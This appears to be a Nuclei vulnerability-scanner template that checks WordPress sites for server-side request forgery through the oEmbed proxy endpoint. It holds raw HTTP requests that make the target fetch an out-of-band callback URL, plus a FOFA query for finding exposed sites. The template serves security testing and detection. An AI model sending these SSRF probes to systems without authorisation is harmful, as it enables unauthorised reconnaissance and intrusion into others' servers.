id: wordpress-ssrf-oembed

info:
  name: Wordpress Oembed Proxy - Server-side request forgery
  author: dhiyaneshDk
  severity: medium
  description: The oEmbed feature in WordPress allows embedding content from external sources, and if it's not properly secured, it could be exploited for SSRF.
  reference:
    - https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/wordpress.html
    - https://github.com/incogbyte/quickpress/blob/master/core/req.go
  classification:
    cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: wordpress
    product: wordpress
    fofa-query: body="oembed" && body="wp-"
  tags: wordpress,ssrf,oast,oembed,vuln

http:
  - raw:
      - |
        GET /wp-json/oembed/1.0/proxy HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - 'rest_missing_callback_param'

      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4b0a00483046022100fe99b07b9a6c4a89e1573100d3c278e0636f2de490c57a9c1a03b055076a3a98022100edeccbb9af935e03043114d7d826e8a49b5c75e61649f02b73461f415e915e31:922c64590222798bb761d5b6d8e72950